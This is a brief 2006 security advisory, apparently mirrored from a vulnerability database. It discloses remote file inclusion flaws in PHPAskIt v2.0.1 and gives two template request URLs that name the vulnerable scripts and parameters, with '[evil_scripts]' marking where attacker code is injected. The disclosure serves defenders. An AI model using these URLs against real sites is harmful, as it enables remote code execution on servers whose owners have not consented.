# MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13172
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

/\/\!||! |-|4|23|<47

Milli-Harekat Advisory ( www.milli-harekat.org )

PHPAskIt <== v2.0.1 - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : PHPAskIt v2.0.1

Credits : ERNE erne[at]ernealizm[dot]com

Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,LiZ0zim,EntRэk4,Korsan.Di_lejyoner and All MHG USERS

Vulnerable :

http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts]

http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts]